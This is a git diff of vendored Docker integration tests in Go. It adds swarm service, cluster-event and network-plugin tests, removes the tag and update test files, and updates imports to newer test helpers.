+
+	out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "top2", "--mode=global", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 2)
+
+	out, err = d.Cmd("service", "ls")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "top1")
+	c.Assert(out, checker.Contains, "top2")
+	c.Assert(out, checker.Not(checker.Contains), "localnet")
+
+	out, err = d.Cmd("service", "ls", "--filter", "mode=global")
+	c.Assert(out, checker.Not(checker.Contains), "top1")
+	c.Assert(out, checker.Contains, "top2")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("service", "ls", "--filter", "mode=replicated")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "top1")
+	c.Assert(out, checker.Not(checker.Contains), "top2")
+}
+
+func (s *DockerSwarmSuite) TestSwarmInitUnspecifiedDataPathAddr(c *check.C) {
+	d := s.AddDaemon(c, false, false)
+
+	out, err := d.Cmd("swarm", "init", "--data-path-addr", "0.0.0.0")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "data path address must be a non-zero IP")
+
+	out, err = d.Cmd("swarm", "init", "--data-path-addr", "0.0.0.0:2000")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "data path address must be a non-zero IP")
+}
+
+func (s *DockerSwarmSuite) TestSwarmJoinLeave(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("swarm", "join-token", "-q", "worker")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	token := strings.TrimSpace(out)
+
+	// Verify that back to back join/leave does not cause panics
+	d1 := s.AddDaemon(c, false, false)
+	for i := 0; i < 10; i++ {
+		out, err = d1.Cmd("swarm", "join", "--token", token, d.SwarmListenAddr())
+		c.Assert(err, checker.IsNil)
+		c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+		_, err = d1.Cmd("swarm", "leave")
+		c.Assert(err, checker.IsNil)
+	}
+}
+
+const defaultRetryCount = 10
+
+func waitForEvent(c *check.C, d *daemon.Daemon, since string, filter string, event string, retry int) string {
+	if retry < 1 {
+		c.Fatalf("retry count %d is invalid. It should be no less than 1", retry)
+		return ""
+	}
+	var out string
+	for i := 0; i < retry; i++ {
+		until := daemonUnixTime(c)
+		var err error
+		if len(filter) > 0 {
+			out, err = d.Cmd("events", "--since", since, "--until", until, filter)
+		} else {
+			out, err = d.Cmd("events", "--since", since, "--until", until)
+		}
+		c.Assert(err, checker.IsNil, check.Commentf(out))
+		if strings.Contains(out, event) {
+			return strings.TrimSpace(out)
+		}
+		// no need to sleep after last retry
+		if i < retry-1 {
+			time.Sleep(200 * time.Millisecond)
+		}
+	}
+	c.Fatalf("docker events output '%s' doesn't contain event '%s'", out, event)
+	return ""
+}
+
+func (s *DockerSwarmSuite) TestSwarmClusterEventsSource(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, true)
+	d3 := s.AddDaemon(c, true, false)
+
+	// create a network
+	out, err := d1.Cmd("network", "create", "--attachable", "-d", "overlay", "foo")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	networkID := strings.TrimSpace(out)
+	c.Assert(networkID, checker.Not(checker.Equals), "")
+
+	// d1, d2 are managers that can get swarm events
+	waitForEvent(c, d1, "0", "-f scope=swarm", "network create "+networkID, defaultRetryCount)
+	waitForEvent(c, d2, "0", "-f scope=swarm", "network create "+networkID, defaultRetryCount)
+
+	// d3 is a worker, not able to get cluster events
+	out = waitForEvent(c, d3, "0", "-f scope=swarm", "", 1)
+	c.Assert(out, checker.Not(checker.Contains), "network create ")
+}
+
+func (s *DockerSwarmSuite) TestSwarmClusterEventsScope(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// create a service
+	out, err := d.Cmd("service", "create", "--no-resolve-image", "--name", "test", "--detach=false", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	serviceID := strings.Split(out, "\n")[0]
+
+	// scope swarm filters cluster events
+	out = waitForEvent(c, d, "0", "-f scope=swarm", "service create "+serviceID, defaultRetryCount)
+	c.Assert(out, checker.Not(checker.Contains), "container create ")
+
+	// all events are returned if scope is not specified
+	waitForEvent(c, d, "0", "", "service create "+serviceID, 1)
+	waitForEvent(c, d, "0", "", "container create ", defaultRetryCount)
+
+	// scope local only shows non-cluster events
+	out = waitForEvent(c, d, "0", "-f scope=local", "container create ", 1)
+	c.Assert(out, checker.Not(checker.Contains), "service create ")
+}
+
+func (s *DockerSwarmSuite) TestSwarmClusterEventsType(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// create a service
+	out, err := d.Cmd("service", "create", "--no-resolve-image", "--name", "test", "--detach=false", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	serviceID := strings.Split(out, "\n")[0]
+
+	// create a network
+	out, err = d.Cmd("network", "create", "--attachable", "-d", "overlay", "foo")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	networkID := strings.TrimSpace(out)
+	c.Assert(networkID, checker.Not(checker.Equals), "")
+
+	// filter by service
+	out = waitForEvent(c, d, "0", "-f type=service", "service create "+serviceID, defaultRetryCount)
+	c.Assert(out, checker.Not(checker.Contains), "network create")
+
+	// filter by network
+	out = waitForEvent(c, d, "0", "-f type=network", "network create "+networkID, defaultRetryCount)
+	c.Assert(out, checker.Not(checker.Contains), "service create")
+}
+
+func (s *DockerSwarmSuite) TestSwarmClusterEventsService(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// create a service
+	out, err := d.Cmd("service", "create", "--no-resolve-image", "--name", "test", "--detach=false", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	serviceID := strings.Split(out, "\n")[0]
+
+	// validate service create event
+	waitForEvent(c, d, "0", "-f scope=swarm", "service create "+serviceID, defaultRetryCount)
+
+	t1 := daemonUnixTime(c)
+	out, err = d.Cmd("service", "update", "--force", "--detach=false", "test")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// wait for service update start
+	out = waitForEvent(c, d, t1, "-f scope=swarm", "service update "+serviceID, defaultRetryCount)
+	c.Assert(out, checker.Contains, "updatestate.new=updating")
+
+	// allow service update complete. This is a service with 1 instance
+	time.Sleep(400 * time.Millisecond)
+	out = waitForEvent(c, d, t1, "-f scope=swarm", "service update "+serviceID, defaultRetryCount)
+	c.Assert(out, checker.Contains, "updatestate.new=completed, updatestate.old=updating")
+
+	// scale service
+	t2 := daemonUnixTime(c)
+	out, err = d.Cmd("service", "scale", "test=3")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out = waitForEvent(c, d, t2, "-f scope=swarm", "service update "+serviceID, defaultRetryCount)
+	c.Assert(out, checker.Contains, "replicas.new=3, replicas.old=1")
+
+	// remove service
+	t3 := daemonUnixTime(c)
+	out, err = d.Cmd("service", "rm", "test")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	waitForEvent(c, d, t3, "-f scope=swarm", "service remove "+serviceID, defaultRetryCount)
+}
+
+func (s *DockerSwarmSuite) TestSwarmClusterEventsNode(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	s.AddDaemon(c, true, true)
+	d3 := s.AddDaemon(c, true, true)
+
+	d3ID := d3.NodeID()
+	waitForEvent(c, d1, "0", "-f scope=swarm", "node create "+d3ID, defaultRetryCount)
+
+	t1 := daemonUnixTime(c)
+	out, err := d1.Cmd("node", "update", "--availability=pause", d3ID)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// filter by type
+	out = waitForEvent(c, d1, t1, "-f type=node", "node update "+d3ID, defaultRetryCount)
+	c.Assert(out, checker.Contains, "availability.new=pause, availability.old=active")
+
+	t2 := daemonUnixTime(c)
+	out, err = d1.Cmd("node", "demote", d3ID)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	waitForEvent(c, d1, t2, "-f type=node", "node update "+d3ID, defaultRetryCount)
+
+	t3 := daemonUnixTime(c)
+	out, err = d1.Cmd("node", "rm", "-f", d3ID)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// filter by scope
+	waitForEvent(c, d1, t3, "-f scope=swarm", "node remove "+d3ID, defaultRetryCount)
+}
+
+func (s *DockerSwarmSuite) TestSwarmClusterEventsNetwork(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// create a network
+	out, err := d.Cmd("network", "create", "--attachable", "-d", "overlay", "foo")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	networkID := strings.TrimSpace(out)
+
+	waitForEvent(c, d, "0", "-f scope=swarm", "network create "+networkID, defaultRetryCount)
+
+	// remove network
+	t1 := daemonUnixTime(c)
+	out, err = d.Cmd("network", "rm", "foo")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// filtered by network
+	waitForEvent(c, d, t1, "-f type=network", "network remove "+networkID, defaultRetryCount)
+}
+
+func (s *DockerSwarmSuite) TestSwarmClusterEventsSecret(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	testName := "test_secret"
+	id := d.CreateSecret(c, swarm.SecretSpec{
+		Annotations: swarm.Annotations{
+			Name: testName,
+		},
+		Data: []byte("TESTINGDATA"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
+
+	waitForEvent(c, d, "0", "-f scope=swarm", "secret create "+id, defaultRetryCount)
+
+	t1 := daemonUnixTime(c)
+	d.DeleteSecret(c, id)
+	// filtered by secret
+	waitForEvent(c, d, t1, "-f type=secret", "secret remove "+id, defaultRetryCount)
+}
+
+func (s *DockerSwarmSuite) TestSwarmClusterEventsConfig(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	testName := "test_config"
+	id := d.CreateConfig(c, swarm.ConfigSpec{
+		Annotations: swarm.Annotations{
+			Name: testName,
+		},
+		Data: []byte("TESTINGDATA"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id))
+
+	waitForEvent(c, d, "0", "-f scope=swarm", "config create "+id, defaultRetryCount)
+
+	t1 := daemonUnixTime(c)
+	d.DeleteConfig(c, id)
+	// filtered by config
+	waitForEvent(c, d, t1, "-f type=config", "config remove "+id, defaultRetryCount)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go
index d9e56ce6df..3b890bcc69 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go
@@ -5,20 +5,21 @@ package main
 import (
 	"encoding/json"
 	"strings"
+	"time"
 
 	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
 )
 
 func (s *DockerSwarmSuite) TestSwarmVolumePlugin(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
-	out, err := d.Cmd("service", "create", "--mount", "type=volume,source=my-volume,destination=/foo,volume-driver=customvolumedriver", "--name", "top", "busybox", "top")
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--mount", "type=volume,source=my-volume,destination=/foo,volume-driver=customvolumedriver", "--name", "top", "busybox", "top")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 
 	// Make sure task stays pending before plugin is available
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkServiceTasksInState("top", swarm.TaskStatePending, "missing plugin on 1 node"), checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckServiceTasksInStateWithError("top", swarm.TaskStatePending, "missing plugin on 1 node"), checker.Equals, 1)
 
 	plugin := newVolumePlugin(c, "customvolumedriver")
 	defer plugin.Close()
@@ -31,7 +32,7 @@ func (s *DockerSwarmSuite) TestSwarmVolumePlugin(c *check.C) {
 	// this long delay.
 
 	// make sure task has been deployed.
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
 
 	out, err = d.Cmd("ps", "-q")
 	c.Assert(err, checker.IsNil)
@@ -50,3 +51,54 @@ func (s *DockerSwarmSuite) TestSwarmVolumePlugin(c *check.C) {
 	c.Assert(mounts[0].Name, checker.Equals, "my-volume")
 	c.Assert(mounts[0].Driver, checker.Equals, "customvolumedriver")
 }
+
+// Test network plugin filter in swarm
+func (s *DockerSwarmSuite) TestSwarmNetworkPluginV2(c *check.C) {
+	testRequires(c, IsAmd64)
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, false)
+
+	// install plugin on d1 and d2
+	pluginName := "aragunathan/global-net-plugin:latest"
+
+	_, err := d1.Cmd("plugin", "install", pluginName, "--grant-all-permissions")
+	c.Assert(err, checker.IsNil)
+
+	_, err = d2.Cmd("plugin", "install", pluginName, "--grant-all-permissions")
+	c.Assert(err, checker.IsNil)
+
+	// create network
+	networkName := "globalnet"
+	_, err = d1.Cmd("network", "create", "--driver", pluginName, networkName)
+	c.Assert(err, checker.IsNil)
+
+	// create a global service to ensure that both nodes will have an instance
+	serviceName := "my-service"
+	_, err = d1.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--mode=global", "--network", networkName, "busybox", "top")
+	c.Assert(err, checker.IsNil)
+
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, 2)
+
+	// remove service
+	_, err = d1.Cmd("service", "rm", serviceName)
+	c.Assert(err, checker.IsNil)
+
+	// wait to ensure all containers have exited before removing the plugin. Else there's a
+	// possibility of container exits erroring out due to plugins being unavailable.
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, 0)
+
+	// disable plugin on worker
+	_, err = d2.Cmd("plugin", "disable", "-f", pluginName)
+	c.Assert(err, checker.IsNil)
+
+	time.Sleep(20 * time.Second)
+
+	image := "busybox:latest"
+	// create a new global service again.
+	_, err = d1.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--mode=global", "--network", networkName, image, "top")
+	c.Assert(err, checker.IsNil)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d1.CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image: 1})
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go
deleted file mode 100644
index b7d2b1dfe6..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go
+++ /dev/null
@@ -1,225 +0,0 @@
-package main
-
-import (
-	"fmt"
-	"strings"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/pkg/stringutils"
-	"github.com/go-check/check"
-)
-
-// tagging a named image in a new unprefixed repo should work
-func (s *DockerSuite) TestTagUnprefixedRepoByName(c *check.C) {
-	// Don't attempt to pull on Windows as not in hub. It's installed
-	// as an image through .ensure-frozen-images-windows
-	if daemonPlatform != "windows" {
-		if err := pullImageIfNotExist("busybox:latest"); err != nil {
-			c.Fatal("couldn't find the busybox:latest image locally and failed to pull it")
-		}
-	}
-
-	dockerCmd(c, "tag", "busybox:latest", "testfoobarbaz")
-}
-
-// tagging an image by ID in a new unprefixed repo should work
-func (s *DockerSuite) TestTagUnprefixedRepoByID(c *check.C) {
-	imageID := inspectField(c, "busybox", "Id")
-	dockerCmd(c, "tag", imageID, "testfoobarbaz")
-}
-
-// ensure we don't allow the use of invalid repository names; these tag operations should fail
-func (s *DockerSuite) TestTagInvalidUnprefixedRepo(c *check.C) {
-	invalidRepos := []string{"fo$z$", "Foo@3cc", "Foo$3", "Foo*3", "Fo^3", "Foo!3", "F)xcz(", "fo%asd", "FOO/bar"}
-
-	for _, repo := range invalidRepos {
-		out, _, err := dockerCmdWithError("tag", "busybox", repo)
-		c.Assert(err, checker.NotNil, check.Commentf("tag busybox %v should have failed : %v", repo, out))
-	}
-}
-
-// ensure we don't allow the use of invalid tags; these tag operations should fail
-func (s *DockerSuite) TestTagInvalidPrefixedRepo(c *check.C) {
-	longTag := stringutils.GenerateRandomAlphaOnlyString(121)
-
-	invalidTags := []string{"repo:fo$z$", "repo:Foo@3cc", "repo:Foo$3", "repo:Foo*3", "repo:Fo^3", "repo:Foo!3", "repo:%goodbye", "repo:#hashtagit", "repo:F)xcz(", "repo:-foo", "repo:..", longTag}
-
-	for _, repotag := range invalidTags {
-		out, _, err := dockerCmdWithError("tag", "busybox", repotag)
-		c.Assert(err, checker.NotNil, check.Commentf("tag busybox %v should have failed : %v", repotag, out))
-	}
-}
-
-// ensure we allow the use of valid tags
-func (s *DockerSuite) TestTagValidPrefixedRepo(c *check.C) {
-	// Don't attempt to pull on Windows as not in hub. It's installed
-	// as an image through .ensure-frozen-images-windows
-	if daemonPlatform != "windows" {
-		if err := pullImageIfNotExist("busybox:latest"); err != nil {
-			c.Fatal("couldn't find the busybox:latest image locally and failed to pull it")
-		}
-	}
-
-	validRepos := []string{"fooo/bar", "fooaa/test", "foooo:t", "HOSTNAME.DOMAIN.COM:443/foo/bar"}
-
-	for _, repo := range validRepos {
-		_, _, err := dockerCmdWithError("tag", "busybox:latest", repo)
-		if err != nil {
-			c.Errorf("tag busybox %v should have worked: %s", repo, err)
-			continue
-		}
-		deleteImages(repo)
-	}
-}
-
-// tag an image with an existed tag name without -f option should work
-func (s *DockerSuite) TestTagExistedNameWithoutForce(c *check.C) {
-	// Don't attempt to pull on Windows as not in hub. It's installed
-	// as an image through .ensure-frozen-images-windows
-	if daemonPlatform != "windows" {
-		if err := pullImageIfNotExist("busybox:latest"); err != nil {
-			c.Fatal("couldn't find the busybox:latest image locally and failed to pull it")
-		}
-	}
-
-	dockerCmd(c, "tag", "busybox:latest", "busybox:test")
-}
-
-func (s *DockerSuite) TestTagWithPrefixHyphen(c *check.C) {
-	// Don't attempt to pull on Windows as not in hub. It's installed
-	// as an image through .ensure-frozen-images-windows
-	if daemonPlatform != "windows" {
-		if err := pullImageIfNotExist("busybox:latest"); err != nil {
-			c.Fatal("couldn't find the busybox:latest image locally and failed to pull it")
-		}
-	}
-	// test repository name begin with '-'
-	out, _, err := dockerCmdWithError("tag", "busybox:latest", "-busybox:test")
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed"))
-
-	// test namespace name begin with '-'
-	out, _, err = dockerCmdWithError("tag", "busybox:latest", "-test/busybox:test")
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed"))
-
-	// test index name begin with '-'
-	out, _, err = dockerCmdWithError("tag", "busybox:latest", "-index:5000/busybox:test")
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed"))
-}
-
-// ensure tagging using official names works
-// ensure all tags result in the same name
-func (s *DockerSuite) TestTagOfficialNames(c *check.C) {
-	names := []string{
-		"docker.io/busybox",
-		"index.docker.io/busybox",
-		"library/busybox",
-		"docker.io/library/busybox",
-		"index.docker.io/library/busybox",
-	}
-
-	for _, name := range names {
-		out, exitCode, err := dockerCmdWithError("tag", "busybox:latest", name+":latest")
-		if err != nil || exitCode != 0 {
-			c.Errorf("tag busybox %v should have worked: %s, %s", name, err, out)
-			continue
-		}
-
-		// ensure we don't have multiple tag names.
-		out, _, err = dockerCmdWithError("images")
-		if err != nil {
-			c.Errorf("listing images failed with errors: %v, %s", err, out)
-		} else if strings.Contains(out, name) {
-			c.Errorf("images should not have listed '%s'", name)
-			deleteImages(name + ":latest")
-		}
-	}
-
-	for _, name := range names {
-		_, exitCode, err := dockerCmdWithError("tag", name+":latest", "fooo/bar:latest")
-		if err != nil || exitCode != 0 {
-			c.Errorf("tag %v fooo/bar should have worked: %s", name, err)
-			continue
-		}
-		deleteImages("fooo/bar:latest")
-	}
-}
-
-// ensure tags can not match digests
-func (s *DockerSuite) TestTagMatchesDigest(c *check.C) {
-	// Don't attempt to pull on Windows as not in hub. It's installed
-	// as an image through .ensure-frozen-images-windows
-	if daemonPlatform != "windows" {
-		if err := pullImageIfNotExist("busybox:latest"); err != nil {
-			c.Fatal("couldn't find the busybox:latest image locally and failed to pull it")
-		}
-	}
-	digest := "busybox@sha256:abcdef76720241213f5303bda7704ec4c2ef75613173910a56fb1b6e20251507"
-	// test setting tag fails
-	_, _, err := dockerCmdWithError("tag", "busybox:latest", digest)
-	if err == nil {
-		c.Fatal("digest tag a name should have failed")
-	}
-	// check that no new image matches the digest
-	_, _, err = dockerCmdWithError("inspect", digest)
-	if err == nil {
-		c.Fatal("inspecting by digest should have failed")
-	}
-}
-
-func (s *DockerSuite) TestTagInvalidRepoName(c *check.C) {
-	// Don't attempt to pull on Windows as not in hub. It's installed
-	// as an image through .ensure-frozen-images-windows
-	if daemonPlatform != "windows" {
-		if err := pullImageIfNotExist("busybox:latest"); err != nil {
-			c.Fatal("couldn't find the busybox:latest image locally and failed to pull it")
-		}
-	}
-
-	// test setting tag fails
-	_, _, err := dockerCmdWithError("tag", "busybox:latest", "sha256:sometag")
-	if err == nil {
-		c.Fatal("tagging with image named \"sha256\" should have failed")
-	}
-}
-
-// ensure tags cannot create ambiguity with image ids
-func (s *DockerSuite) TestTagTruncationAmbiguity(c *check.C) {
-	//testRequires(c, DaemonIsLinux)
-	// Don't attempt to pull on Windows as not in hub. It's installed
-	// as an image through .ensure-frozen-images-windows
-	if daemonPlatform != "windows" {
-		if err := pullImageIfNotExist("busybox:latest"); err != nil {
-			c.Fatal("couldn't find the busybox:latest image locally and failed to pull it")
-		}
-	}
-	imageID, err := buildImage("notbusybox:latest",
-		`FROM busybox
-		MAINTAINER dockerio`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	truncatedImageID := stringid.TruncateID(imageID)
-	truncatedTag := fmt.Sprintf("notbusybox:%s", truncatedImageID)
-
-	id := inspectField(c, truncatedTag, "Id")
-
-	// Ensure inspect by image id returns image for image id
-	c.Assert(id, checker.Equals, imageID)
-	c.Logf("Built image: %s", imageID)
-
-	// test setting tag fails
-	_, _, err = dockerCmdWithError("tag", "busybox:latest", truncatedTag)
-	if err != nil {
-		c.Fatalf("Error tagging with an image id: %s", err)
-	}
-
-	id = inspectField(c, truncatedTag, "Id")
-
-	// Ensure id is imageID and not busybox:latest
-	c.Assert(id, checker.Not(checker.Equals), imageID)
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go
index caae29024a..50744b0111 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go
@@ -3,28 +3,28 @@ package main
 import (
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
-	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 func (s *DockerSuite) TestTopMultipleArgs(c *check.C) {
-	out, _ := runSleepingContainer(c, "-d")
+	out := runSleepingContainer(c, "-d")
 	cleanedContainerID := strings.TrimSpace(out)
 
 	var expected icmd.Expected
-	switch daemonPlatform {
+	switch testEnv.OSType {
 	case "windows":
 		expected = icmd.Expected{ExitCode: 1, Err: "Windows does not support arguments to top"}
 	default:
 		expected = icmd.Expected{Out: "PID"}
 	}
 	result := dockerCmdWithResult("top", cleanedContainerID, "-o", "pid")
-	c.Assert(result, icmd.Matches, expected)
+	result.Assert(c, expected)
 }
 
 func (s *DockerSuite) TestTopNonPrivileged(c *check.C) {
-	out, _ := runSleepingContainer(c, "-d")
+	out := runSleepingContainer(c, "-d")
 	cleanedContainerID := strings.TrimSpace(out)
 
 	out1, _ := dockerCmd(c, "top", cleanedContainerID)
@@ -34,7 +34,7 @@ func (s *DockerSuite) TestTopNonPrivileged(c *check.C) {
 	// Windows will list the name of the launched executable which in this case is busybox.exe, without the parameters.
 	// Linux will display the command executed in the container
 	var lookingFor string
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		lookingFor = "busybox.exe"
 	} else {
 		lookingFor = "top"
@@ -49,7 +49,7 @@ func (s *DockerSuite) TestTopNonPrivileged(c *check.C) {
 // very different to Linux in this regard.
 func (s *DockerSuite) TestTopWindowsCoreProcesses(c *check.C) {
 	testRequires(c, DaemonIsWindows)
-	out, _ := runSleepingContainer(c, "-d")
+	out := runSleepingContainer(c, "-d")
 	cleanedContainerID := strings.TrimSpace(out)
 	out1, _ := dockerCmd(c, "top", cleanedContainerID)
 	lookingFor := []string{"smss.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe", "CExecSvc.exe"}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go
deleted file mode 100644
index 0b31bb45ff..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go
+++ /dev/null
@@ -1,41 +0,0 @@
-package main
-
-import (
-	"strings"
-	"time"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestUpdateRestartPolicy(c *check.C) {
-	out, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "sh", "-c", "sleep 1 && false")
-	timeout := 60 * time.Second
-	if daemonPlatform == "windows" {
-		timeout = 180 * time.Second
-	}
-
-	id := strings.TrimSpace(string(out))
-
-	// update restart policy to on-failure:5
-	dockerCmd(c, "update", "--restart=on-failure:5", id)
-
-	err := waitExited(id, timeout)
-	c.Assert(err, checker.IsNil)
-
-	count := inspectField(c, id, "RestartCount")
-	c.Assert(count, checker.Equals, "5")
-
-	maximumRetryCount := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount")
-	c.Assert(maximumRetryCount, checker.Equals, "5")
-}
-
-func (s *DockerSuite) TestUpdateRestartWithAutoRemoveFlag(c *check.C) {
-	out, _ := runSleepingContainer(c, "--rm")
-	id := strings.TrimSpace(out)
-
-	// update restart policy for an AutoRemove container
-	out, _, err := dockerCmdWithError("update", "--restart=always", id)
-	c.Assert(err, checker.NotNil)
-	c.Assert(out, checker.Contains, "Restart policy cannot be updated because AutoRemove is enabled for the container")
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go
index 580ff02602..564c50f32f 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go
@@ -3,17 +3,20 @@
 package main
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
-	"github.com/kr/pty"
 	"os/exec"
 	"strings"
 	"time"
 
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/internal/test/request"
 	"github.com/docker/docker/pkg/parsers/kernel"
 	"github.com/go-check/check"
+	"github.com/kr/pty"
 )
 
 func (s *DockerSuite) TestUpdateRunningContainer(c *check.C) {
@@ -136,7 +139,7 @@ func (s *DockerSuite) TestUpdateKernelMemory(c *check.C) {
 func (s *DockerSuite) TestUpdateKernelMemoryUninitialized(c *check.C) {
 	testRequires(c, DaemonIsLinux, kernelMemorySupport)
 
-	isNewKernel := kernel.CheckKernelVersion(4, 6, 0)
+	isNewKernel := CheckKernelVersion(4, 6, 0)
 	name := "test-update-container"
 	dockerCmd(c, "run", "-d", "--name", name, "busybox", "top")
 	_, _, err := dockerCmdWithError("update", "--kernel-memory", "100M", name)
@@ -168,6 +171,18 @@ func (s *DockerSuite) TestUpdateKernelMemoryUninitialized(c *check.C) {
 	c.Assert(strings.TrimSpace(out), checker.Equals, "314572800")
 }
 
+// GetKernelVersion gets the current kernel version.
+func GetKernelVersion() *kernel.VersionInfo {
+	v, _ := kernel.ParseRelease(testEnv.DaemonInfo.KernelVersion)
+	return v
+}
+
+// CheckKernelVersion checks if current kernel is newer than (or equal to)
+// the given version.
+func CheckKernelVersion(k, major, minor int) bool {
+	return kernel.CompareKernelVersion(*GetKernelVersion(), kernel.VersionInfo{Kernel: k, Major: major, Minor: minor}) >= 0
+}
+
 func (s *DockerSuite) TestUpdateSwapMemoryOnly(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	testRequires(c, memoryLimitSupport)
@@ -219,7 +234,7 @@ func (s *DockerSuite) TestUpdateStats(c *check.C) {
 	c.Assert(waitRun(name), checker.IsNil)
 
 	getMemLimit := func(id string) uint64 {
-		resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "")
+		resp, body, err := request.Get(fmt.Sprintf("/containers/%s/stats?stream=false", id))
 		c.Assert(err, checker.IsNil)
